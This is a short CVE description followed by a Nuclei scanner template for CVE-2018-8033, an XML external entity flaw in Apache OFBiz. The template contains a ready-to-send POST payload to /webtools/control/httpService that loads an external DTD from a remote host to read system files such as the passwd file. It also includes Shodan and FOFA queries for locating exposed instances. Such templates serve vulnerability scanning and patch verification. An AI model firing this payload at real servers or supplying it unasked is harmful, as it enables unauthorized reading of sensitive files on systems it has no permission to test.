In Apache OFBiz 16.11.01 to 16.11.04, the OFBiz HTTP engine (org.apache.ofbiz.service.engine.HttpEngine.java) handles requests for HTTP services via the /webtools/control/httpService endpoint. Both POST and GET requests to the httpService endpoint may contain three parameters: serviceName, serviceMode, and serviceContext. The exploitation occurs by having DOCTYPEs pointing to external references that trigger a payload that returns secret information from the host.
PoC代码[已公开]
id: CVE-2018-8033
info:
name: Apache OFBiz - XML External Entity Injection
author: daffainfo
severity: high
description: |
In Apache OFBiz 16.11.01 to 16.11.04, the OFBiz HTTP engine (org.apache.ofbiz.service.engine.HttpEngine.java) handles requests for HTTP services via the /webtools/control/httpService endpoint. Both POST and GET requests to the httpService endpoint may contain three parameters: serviceName, serviceMode, and serviceContext. The exploitation occurs by having DOCTYPEs pointing to external references that trigger a payload that returns secret information from the host.
impact: |
Attackers can read sensitive files or cause denial of service by exploiting XXE vulnerability.
remediation: |
Update to the latest version of Apache OFBiz that addresses the XXE vulnerability or apply security patches.
reference:
- https://lists.apache.org/thread/9bym7qk6ccwwr6d3mg26thp9zyv1l06y
- https://nvd.nist.gov/vuln/detail/CVE-2018-8033
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-8033
cwe-id: CWE-200
epss-score: 0.92044
epss-percentile: 0.99687
cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: apache
product: ofbiz
shodan-query:
- http.html:"ofbiz"
- ofbiz.visitor=
fofa-query:
- body="ofbiz"
- app="apache_ofbiz"
tags: cve,cve2018,apache,ofbiz,xxe,vuln
http:
- raw:
- |
POST /webtools/control/httpService HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
serviceName=createPartyGroup&serviceMode=sync&serviceContext=<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY %25 request SYSTEM 'https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/refs/heads/main/helpers/payloads/xxe-poc.dtd'>%25request;%25secondstage;]><r>%26disclose;</r>
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "FileNotFoundException:"
- "nonexistent\\/root:.*:0:0:"
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022031b25549d406cef714be9e580ff004649b79212076cbc4927eed274b36c8f8100221009e0e2633ace0922a0bfe423807ea27156c29b3e33bb3ca9b81cb2c404df84357:922c64590222798bb761d5b6d8e72950